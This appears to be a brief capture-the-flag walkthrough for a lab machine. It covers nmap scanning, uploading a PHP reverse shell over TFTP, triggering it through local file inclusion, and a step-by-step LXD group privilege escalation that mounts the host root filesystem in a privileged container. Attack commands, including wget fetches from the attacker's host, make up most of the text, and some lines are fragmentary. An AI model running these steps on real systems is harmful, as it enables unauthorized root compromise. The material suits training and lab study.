Included¶
nmap -sV <target_ip>
sudo nmap -sU --min-rate 5000 <target_ip>
sudo nmap -p tftp --min-rate 5000 <target_ip>
shell.php: change $ip and $port with yours
then access uploaded file from LFI
stored folder can be found from passwd or googling it
The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa. The default root directory where files will be stored is /var/lib/tftpboot
just for convinience os use
Privilege¶
LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.
Installing Go and other required package
Download the Alpine YAML
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
Once the build is done lxd.tar.xz and rootlet.squashfs will be available in the same folder
run on the same folder
go back on target system
wget http://{local_IP}:8000/lxd.tar.xz
wget http://{local_IP}:8000/rootfs.squashfs
ls -la
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
To access the root flag, we can navigate to the /mnt/root/root folder.